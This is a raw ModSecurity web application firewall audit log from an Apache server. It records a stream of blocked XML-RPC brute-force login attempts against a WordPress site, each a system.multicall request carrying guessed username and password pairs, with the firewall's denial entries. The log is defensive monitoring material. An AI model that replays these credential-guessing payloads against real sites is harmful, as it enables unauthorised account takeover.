Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --272ee562-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh1995 --272ee562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --272ee562-E-- --272ee562-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101883467103 4444 (- - -) Stopwatch2: 1749101883467103 4444; combined=3509, p1=388, p2=2934, p3=0, p4=0, p5=107, sr=79, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --272ee562-Z-- --f87dad2d-A-- [05/Jun/2025:12:38:58 +0700] aEEtcuth7G2xELALzPYh-wAAAM0 103.236.140.4 36220 103.236.140.4 8181 --f87dad2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f87dad2d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh55 --f87dad2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f87dad2d-E-- --f87dad2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101938749104 5503 (- - -) Stopwatch2: 1749101938749104 5503; combined=3949, p1=503, p2=3176, p3=0, p4=0, p5=149, sr=88, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f87dad2d-Z-- --a3442649-A-- [05/Jun/2025:12:40:06 +0700] aEEttuth7G2xELALzPYh_wAAANM 103.236.140.4 36240 103.236.140.4 8181 --a3442649-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.37.121.239 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.37.121.239 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a3442649-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin125 --a3442649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3442649-E-- --a3442649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.37.121.239 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102006877620 5689 (- - -) Stopwatch2: 1749102006877620 5689; combined=4012, p1=495, p2=3350, p3=0, p4=0, p5=99, sr=87, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3442649-Z-- --11cd1f5f-A-- [05/Jun/2025:12:40:30 +0700] aEEtzlwdJdhOudw5hdzPMwAAAJA 103.236.140.4 36256 103.236.140.4 8181 --11cd1f5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11cd1f5f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh56 --11cd1f5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11cd1f5f-E-- --11cd1f5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102030579041 4239 (- - -) Stopwatch2: 1749102030579041 4239; combined=2856, p1=400, p2=2344, p3=0, p4=0, p5=67, sr=81, sw=45, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11cd1f5f-Z-- --db23a05b-A-- [05/Jun/2025:12:41:47 +0700] aEEuG-th7G2xELALzPYiBwAAAMM 103.236.140.4 36268 103.236.140.4 8181 --db23a05b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 477 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --db23a05b-C-- system.multicallmethodNamewp.getUsersBlogsparamstestantix --db23a05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db23a05b-E-- --db23a05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (2+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102107874309 6275 (- - -) Stopwatch2: 1749102107874309 6275; combined=4471, p1=512, p2=3729, p3=0, p4=0, p5=132, sr=83, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db23a05b-Z-- --06b92812-A-- [05/Jun/2025:12:47:48 +0700] aEEvhCrHpfaS2Cuwh8XURQAAAFI 103.236.140.4 36422 103.236.140.4 8181 --06b92812-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --06b92812-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin7 --06b92812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06b92812-E-- --06b92812-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102468627562 4644 (- - -) Stopwatch2: 1749102468627562 4644; combined=3526, p1=397, p2=2970, p3=0, p4=0, p5=93, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06b92812-Z-- --2361051f-A-- [05/Jun/2025:12:48:51 +0700] aEEvw-th7G2xELALzPYiSQAAAMQ 103.236.140.4 36456 103.236.140.4 8181 --2361051f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2361051f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSolehweb --2361051f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2361051f-E-- --2361051f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102531761592 4547 (- - -) Stopwatch2: 1749102531761592 4547; combined=3537, p1=379, p2=2992, p3=0, p4=0, p5=97, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2361051f-Z-- --bd18ba54-A-- [05/Jun/2025:12:49:28 +0700] aEEv6H-K7ToMdu-YSIIkegAAAAI 103.236.140.4 36478 103.236.140.4 8181 --bd18ba54-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bd18ba54-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1997 --bd18ba54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd18ba54-E-- --bd18ba54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102568192987 6095 (- - -) Stopwatch2: 1749102568192987 6095; combined=4269, p1=546, p2=3530, p3=0, p4=0, p5=114, sr=98, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd18ba54-Z-- --b9b80906-A-- [05/Jun/2025:12:49:53 +0700] aEEwAeth7G2xELALzPYiVQAAANQ 103.236.140.4 36488 103.236.140.4 8181 --b9b80906-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b9b80906-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh.2019 --b9b80906-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b80906-E-- --b9b80906-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102593880529 4538 (- - -) Stopwatch2: 1749102593880529 4538; combined=3547, p1=372, p2=3010, p3=0, p4=0, p5=96, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b80906-Z-- --7d4c475f-A-- [05/Jun/2025:12:52:19 +0700] aEEwk1wdJdhOudw5hdzPPgAAAIM 103.236.140.4 36608 103.236.140.4 8181 --7d4c475f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7d4c475f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin123123 --7d4c475f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d4c475f-E-- --7d4c475f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102739637026 5011 (- - -) Stopwatch2: 1749102739637026 5011; combined=3754, p1=447, p2=3138, p3=0, p4=0, p5=98, sr=107, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d4c475f-Z-- --1fe89518-A-- [05/Jun/2025:12:56:36 +0700] aEExlOth7G2xELALzPYiqwAAAME 103.236.140.4 36760 103.236.140.4 8181 --1fe89518-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1fe89518-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh.2021 --1fe89518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe89518-E-- --1fe89518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102996683342 4724 (- - -) Stopwatch2: 1749102996683342 4724; combined=3626, p1=378, p2=3075, p3=0, p4=0, p5=101, sr=81, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe89518-Z-- --014ec202-A-- [05/Jun/2025:12:56:47 +0700] aEExn-th7G2xELALzPYirQAAAMM 103.236.140.4 36766 103.236.140.4 8181 --014ec202-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 474 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --014ec202-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1 --014ec202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --014ec202-E-- --014ec202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103007935953 6078 (- - -) Stopwatch2: 1749103007935953 6078; combined=4287, p1=538, p2=3584, p3=0, p4=0, p5=99, sr=104, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --014ec202-Z-- --6c907f29-A-- [05/Jun/2025:12:57:11 +0700] aEExt-th7G2xELALzPYitQAAAMs 103.236.140.4 36784 103.236.140.4 8181 --6c907f29-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6c907f29-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin121 --6c907f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c907f29-E-- --6c907f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103031143541 4653 (- - -) Stopwatch2: 1749103031143541 4653; combined=3620, p1=379, p2=3076, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c907f29-Z-- --4069bc5a-A-- [05/Jun/2025:12:58:07 +0700] aEEx7-th7G2xELALzPYiwQAAANY 103.236.140.4 36820 103.236.140.4 8181 --4069bc5a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4069bc5a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminPassword --4069bc5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4069bc5a-E-- --4069bc5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103087337103 5042 (- - -) Stopwatch2: 1749103087337103 5042; combined=3775, p1=448, p2=3166, p3=0, p4=0, p5=95, sr=82, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4069bc5a-Z-- --33246543-A-- [05/Jun/2025:12:58:08 +0700] aEEx8Oth7G2xELALzPYiwgAAANg 103.236.140.4 36822 103.236.140.4 8181 --33246543-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --33246543-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123456! --33246543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33246543-E-- --33246543-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103088944377 4577 (- - -) Stopwatch2: 1749103088944377 4577; combined=3526, p1=384, p2=2976, p3=0, p4=0, p5=97, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33246543-Z-- --49043e78-A-- [05/Jun/2025:12:58:22 +0700] aEEx_lwdJdhOudw5hdzPUgAAAJg 103.236.140.4 36838 103.236.140.4 8181 --49043e78-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --49043e78-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin!@#123 --49043e78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49043e78-E-- --49043e78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103102684875 4820 (- - -) Stopwatch2: 1749103102684875 4820; combined=3729, p1=407, p2=3138, p3=0, p4=0, p5=108, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49043e78-Z-- --a2054375-A-- [05/Jun/2025:12:59:24 +0700] aEEyPOth7G2xELALzPYiywAAAMk 103.236.140.4 36852 103.236.140.4 8181 --a2054375-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 476 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a2054375-C-- 